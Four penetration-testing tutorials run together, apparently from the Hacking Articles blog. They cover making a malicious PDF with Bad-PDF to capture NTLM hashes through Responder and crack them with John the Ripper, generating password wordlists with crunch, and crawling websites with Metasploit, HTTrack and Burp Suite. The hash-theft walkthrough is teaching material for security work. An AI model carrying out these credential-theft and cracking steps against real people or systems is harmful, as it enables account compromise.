Capture NTLM Hashes using PDF (Bad-Pdf)

Today we are demonstrating stealing NTLM hashes through a pdf file. We have already discussed the various method to Capture NTLM Hashes in a Network in our previous article. Recently a new tool has launched “Bad-PDF” and in this article, we are sharing our experience.

Bad-PDF create malicious PDF to steal NTLM(NTLMv1/NTLMv2) Hashes from windows machines, it utilizes vulnerability disclosed by checkpoint team to create the malicious PDF file. Bad-Pdf reads the NTLM hashes using Responder listener.

This method work for all PDF readers(Any version) and java scripts are not required for this attack, most of the EDR/Endpoint solution fail to detect this attack.

Now run the python file with the help of following command given below:

Then it will try to connect with Responder through its default path i.e. /user/bin /responder but in our case, the location of the responder is user/sbin/responder. After then it will ask your network IP, the name of the output file and interface name, submit this information as per your network.

Then it will create a malicious pdf file with name bad.pdf, now transfer this pdf file to your target.

So, when the victim will click our malicious file, his NTLM hash will be captured as shown in below image. Here you can observe username ‘raj’ along with its hash password. Now copy the hash value in a text document so that you can crack this hash value for retrieving the password.

We have paste the hash value in a text file and save it as “hash” on the desktop. Later we had used John the ripper for cracking the hash.

john hash

Awesome!!! We have retrieved password: 133 for user: raj.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Comprehensive Guide to Crunch Tool

Hello friends!! Today we will demonstrate how a pentester can generate his own wordlist for username either password using the most powerful tool CRUNCH. In kali Linux you can easily get crunch by exploring Application > Password Attacks > Crunch

Crunch can generate a wordlist subject to the conditions you specify and its output file can be used in any other another program or file.

We are using crunch version 3.6 for this tutorial and followed given below parameters for generating wordlist.

Syntax: <min> <max> [character-string] [options]

Min-len:  This parameter specify minimum length string required for crunch to start generating wordlist.

Max-len: This parameter specify maximum length string required for crunch to end.

Charset string: This parameter specify character sets for crunch to use for generating wordlist from that string, if you have not specified any string then crunch will default characters string.

Options: crunch serves you a list of options which increase its functionality for generating wordlist as per your requirement.

Generating wordlist without using character string

Execute given below command which will generate a dictionary that contains minimum 2 character letters and maximum 3 by using default character sets. It will start from aa and end with zzz.

crunch 2 3 -o  /root/Desktop/0.txt

Here we had used following parameters for generating a dictionary:

Min_len: 2 for two character letters

Max_len: 3 for three character letters

-o: This option denotes the path to save the output in a text file.

From given below image you can observe that it has generated 18252 number of lines and saved in 0.txt file.

Now here we had used cat command to read the content from inside 0.txt file where we can perceive that it has start from aa and end with zzz as shown in given below image.

cat /root/Desktop/0.txt

Generating wordlist using character string

Now execute given below command which will generate a dictionary that contains minimum 3 character letters and maximum 4 by using “raj” as specified string. Similarly it will start from rrr and end with jjjj.

crunch 3 4  raj -o  /root/Desktop/1.txt

From given below image you can observe that it has generated 108 number of lines and saved in 1.txt file.

Now we had used cat command to read the content from inside 1.txt file where we can perceive that it has start from rrr and end with jjjj.

cat /root/Desktop/1.txt

Similarly we can use string of any number for making a dictionary which contains numeric characters.

For example: some users set their date of birth as password and we would like to generate a dictionary that contains combination of four number such that it represent month and date for instant 25th May as 2505 then you can use “2505” as character string for generating a numeric wordlist.

Generating alpha-numeric wordlist

You can generate you own alpha-numeric wordlist, execute given below command which will generate a dictionary that contains minimum 2 character letters and maximum 3 by using “raj123” as specified string. 

You can set minimum and maximum length for your wordlist as per your requirement.

crunch 2 3  raj123 -o  /root/Desktop/3.txt

Again we had used cat command to read the content from inside 3.txt file where we can perceive that it has combination of alpha-numeric character.

cat /root/Desktop/3.txt

Generating wordlist along with space character

Following command will generate wordlist using space character (\) with string “raj”. Instead of using (\) you can also use double quotes around string as “raj ” along with space within double quotes. 

crunch 1 3  raj\ -o  /root/Desktop/4.txt

Create wordlist using character set file of RainbowCrack

As we known rainbow crack has a character set file which is used for cracking hashes by using rainbow table, but we’ll use this character set file for generating a complex wordlist as per situation demands.

cat /usr/share/rainbowcrack/charset.txt

We had used cat command to express the list of character set that has been stored in charset.txt of rainbowcrack.  From given below image you can observed that it is showing following list of character set.

  • Numeric
  • Alpha
  • Alpha-numeric
  • Loweralpha
  • Loweralpha numeric
  • Mixalpha
  • Mixalpha-numeric
  • Ascii -32-95
  • Ascii -32-65-123-4
  • Alpha-numeric-symbol32-space

Now you can choose any character set for generating wordlist. Let suppose I want to generate a wordlist which contains lower alphabets letter along with numeric number for 5 letter words so for that I will execute following command.

crunch  4 5  -f /usr/share/rainbowcrack/charset.txt loweralpha-numeric -o  /root/Desktop/5.txt

Here –f denotes Specifies a character set from the charset.lst

Again we had used cat command to read the content from inside 5.txt file where we can perceive that it has combination of alpha-numeric character.

cat /root/Desktop/5.txt

Generate wordlist with specific Pattern

Crunch provides –t option to generate a wordlist using a specific pattern as per your requirement.

Using option –t you can generate 4 type patters as specified below:

  • Use @ for lowercase alphabets
  • Use , for uppercase alphabets
  • Use % for numeric character
  • Use ^ for special character symbol

For generating a wordlist that contains 3 numeric characters on the right side of string “raj” for instant raj123, we need to execute following command.

Since we have 3 letters from string raj and we are assuming 3 more numeric number after the given string, therefore the minimum length should be sum of string and pattern character.

crunch 6 6 -t raj%%% -o/root/Desktop/6.txt

Here –t denotes % pattern is used for editing 3 numeric character.

Again we had used cat command to read the content from inside 6.txt file where we can perceive that it has combination of alpha-numeric character.

cat /root/Desktop/6.txt

Generate wordlist with Duplicate character limit

Crunch let you bound the repetition of character by using –d parameters along with the given pattern. 

As we saw, above the pattern for raj%%% starts with raj000 which means every single number will consecutive either twice or thrice such as it will contain word as raj000, raj001, raj111, raj110 and so on in the wordlist.

If you don’t wish to create a wordlist with repeated number then you can use –d option to set filter for repetition.

For example: I want to generate a wordlist by using above pattern i.e. raj%%% and consecutive repetition of each number almost twice. For implementing such type of dictionary we need to execute below command.

crunch 6 6 -t raj%%% -d 2% -o/root/Desktop/6.1.txt

here we had use following parameter

–t denotes % pattern is used for editing 3 numeric character

-d denote % pattern is used for editing 3 numeric character with repetition of each number almost twice.

Again we had used cat command to read the content from inside 6.1.txt file where we can perceive that it has combination of alpha-numeric character with repetition of each number two times.

cat /root/Desktop/6.1.txt

Now if you will compare output file 6.txt and 6.1.txt then you can notice difference of number repetition.

Generate wordlist with Pattern for uppercase letter

For generating a wordlist that contains 3 uppercase characters on the right side of string “raj” for instant rajABC, we need to execute following command.

Since we have 3 letters from string raj and we are assuming 3 more uppercase letter after the given string, therefore the minimum length should be sum of string and pattern character.

crunch 6 6 -t raj,,, -o/root/Desktop/7.txt

Here –t denotes (,) pattern is used for editing 3 uppercase letter character.

Again we had used cat command to read the content from inside 7.txt file where we can perceive that it has combination of mix-alpha character.

cat /root/Desktop/7.txt

Similarly we can set limit for uppercase letter repletion as done above. So if I want that alphabets should not be consecutive then we can execute given below command for generating such type of dictionary.

crunch 6 6 -t raj,,, -d 1, -o/root/Desktop/7.1.txt

–t denotes (,) pattern is used for editing 3 uppercase character

-d denote (,) pattern is used for editing 3 uppercase character with repetition of each number almost one.

Again we had used cat command to read the content from inside 7.1.txt file where we can perceive that it has combination of mix-alpha character with repetition of each number two times.

cat /root/Desktop/7.1.txt

Now if you will compare output file 7.txt and 7.1.txt then you can notice difference of alphabet repetition.

Use Permutation for generating wordlist

-p option is used for generating wordlist with help of permutation, here can ignore min and max length of character string. Moreover it can be used with one word string or multiple words string as given below.

crunch 3 6 –p raj chandel hackingarticles

From given below image you can analysis the output result and get maximum number of permutation generated.

Generate Dictionary with limited words

If you will observe above all output result then you will find crunch has generated dictionary and displays the number of line for each dictionary. For instance text file 0.txt has 18252 number of line and each line contains one word only.

So if you wish to set filter for certain number of line should be generated then execute given below line.

crunch 5 5 IGNITE -c 25 -o /root/Desktop/8.txt

It will generate a dictionary of 25 words only and save output in 8.txt.

Again we had used cat command to read the content from inside8.txt file where we can perceive that it has only 25 alpha character.

cat /root/Desktop/8.txt

Wordlist Fragmentation

Use –b option for wordlist fragmentation that split a single wordlist into multi wordlist. It is quite useful option for dividing wordlist which is in GB can break into MB.

crunch 5 7 [email protected] -b 3mb –o START

From given below image you can observe that it has divided a 7MB file into three text file.

Generate compressed Dictionary

Crunch let you generate compress wordlist with option –z and other parameters are gzip, bzip2, lzma, and 7z, execute given below command for compression.

crunch 5 7 [email protected] –z gzip –o START

 From given below image you can observe that it has generated compress text file.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

5 Ways to Crawl a Website

From Wikipedia

A Web crawler, sometimes called a spider, is an Internet bot that systematically browses the World Wide Web, typically for the purpose of Web indexing .

A Web crawler starts with a list of URLs to visit, called the seeds. As the crawler visits these URLs, it identifies all the hyperlinks in the page and adds them to the list of URLs to visit.  If the crawler is performing archiving of websites it copies and saves the information as it goes. The archive is known as the repository and is designed to store and manage the collection of web pages. A repository is similar to any other system that stores data, like a modern day database.

Let’s Begin!!

Metasploit

This auxiliary module is a modular web crawler, to be used in conjuntion with wmap (someday) or standalone.

use auxiliary/crawler/msfcrawler

msf auxiliary(msfcrawler) > set rhosts www.example.com

msf auxiliary(msfcrawler) > exploit

From, screenshot you can see it has loaded crawler in order to exact hidden file from any website, for example about.php, jquery contact form, html and etc which is not possible to exact manually from website using browser. For information gathering of any website we can use it.

HTTRACK

HTTrack is a free and open source Web crawler and offline browser, developed by Xavier Roche

It allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer. HTTrack arranges the original site’s relative link-structure. 

Type following command inside the terminal

httrack http://tptl.in –O /root/Desktop/file

It will save the output inside given directory /root/Desktop/file

From given screenshot you can observe this, it has dumb the website information inside it which consist html file as well as JavaScript and jquery.

Black Widow

This Web spider utility detects and displays detailed information for a user-selected Web page, and it offers other Web page tools.

BlackWidow’s clean, logically tabbed interface is simple enough for intermediate users to follow but offers just enough under the hood to satisfy advanced users. Simply enter your URL of choice and press Go. BlackWidow uses multithreading to quickly download all files and test the links. The operation takes only a few minutes for small Web sites.

You can download it from here.

Enter your URL http://tptl.in in Address field and press Go.

Click on start button given on left side to begin URL scanning and select a folder  to save the output file.

From screenshot you can observe that I had browse C:\Users\RAJ\Desktop\tptl in order to store output file inside it.

When you will open target folder tptl you will get entire data of website either image or content, html file, php file and JavaScript all are saved in it.

Website Ripper Copier

Website Ripper Copier (WRC) is an all-purpose, high-speed website downloader software to save website data. WRC can download website files to local drive for offline browsing, extract website files of a certain size and type, like image, video, picture, movie and music, retrieve a large number of files as a download manager with resumption support, and mirror sites. WRC is also a site link validator, explorer, and tabbed anti pop-up Web / offline browser.

Website Ripper Copier is the only website downloader tool that can resume broken downloads from HTTP, HTTPS and FTP connections, access password-protected sites, support Web cookies, analyze scripts, update retrieved sites or files, and launch more than fifty retrieval threads

You can download it from here.

 Choose “web sites for offline browsing” option.

Enter the website URL as http://tptl.in and click on next.

Mention directory path to save the output result and click run now.

When you will open selected folder tp you will get fetched css,php,html and js file inside it.

Burp Suite Spider

Burp Spider is a tool for automatically crawling web applications. While it is generally preferable to map applications manually, you can use Burp Spider to partially automate this process for very large applications, or when you are short of time.

For more detail read our privious articles from here.

From given screenshot you can observe that I had fetched the http request of http:// tptl.in; now send to spider with help of action tab.

The targeted website has been added inside the site map under target tab as a new scope for web crawling.  From screenshot you can see it started web crawling of the target website where it has collected the website information in the form of php, html and js.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

How to Spider Web Applications using Burpsuite

Hello friends! Today we are doing web penetration testing using burp suite spider which very rapidly crawl entire web application and dump the formation of targeted web site.

Burp Spider is a tool for automatically crawling web applications. While it is generally preferable to map applications manually, you can use Burp Spider to partially automate this process for very large applications, or when you are short of time.

Source: https://portswigger.net/burp/help/spider.html

 Let’s begin!!

First attacker needs to configure browser and burp proxy to work properly, www.tetphp.vulnweb.com will my targetd web site for enumeration.

Form given below screenshot you can see currently there is no targeted website inside site map of burp suite. To add your targeted web site inside it you need to fetch the http request send by browser to web application server, using intercept option of proxy tab.

Click on proxy tab and turn on intercept in order to catch http request.

Here you can observe that I had fetched the http request of www.tetphp.vulnweb.com; now send to spider with help of action tab.

Confirm your action by making click on YES; Burp will alter the existing target scope to include the preferred item, and all sub-items contained by the site map tree.

Now choose spider tab for further step, here you will find two sub categories control tab and option.

Burp Spider – Control Tab

This tab is used to start and stop Burp Spider, monitor its progress, and define the spidering scope.

 Spider Status

Use these settings to monitor and control Burp Spider:

  • Spider is paused / running– This toggle button is used to start and stop the Spider. While the Spider is stopped it will not make any requests of its own, although it will continue to process responses generated via Burp Proxy (if passive spidering is enabled), and any newly-discovered items that are within the spidering scope will be queued to be requested if the Spider is restarted.
  • Clear queues– If you want to reprioritize your work, you can completely clear the currently queued items, so that other items can be added to the queue. Note that the cleared items may be re-queued if they remain in-scope and the Spider’s parser encounters new links to the items.

 Spider Scope

This panel lets you define exactly what is in the scope for the Spider to request.

The best way to handle spidering scope is normally using the suite-wide target scope, and by default the Spider will use that scope.

Burp Spider Options

This tab contains options for the basic crawler settings, passive spidering, form submission , application login, the Spider engine, and HTTP request headers .

You can monitor the status of the Spider when running, via the Control tab. Any newly discovered content will be added to the Target site map.

When spidering a selected branch of the site map, Burp will carry out the following actions (depending on your settings):

  • Request any unrequested URLs already present within the branch.
  • Submit any discovered forms whose action URLs lay within the branch.
  • Re-request any items in the branch that previously returned 304 status codes, to retrieve fresh (uncached) copies of the application’s responses.
  • Parse all content retrieved to identify new URLs and forms.
  • Recursively repeat these steps as new content is discovered.
  • Continue spidering all in-scope areas until no new content is discovered.

Hence you can see the targeted website has been added inside the site map as a new scope for web crawling. Choose spider this host option by making right click on selected URL which automatically start web crawling.

When you click on preferred target site map further content which has been discover by spider will get added inside it as shown in given image below.

Form screenshot you can see its dump all items of web site even by throwing request and response of host.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Related Posts Plugin for WordPress, Blogger...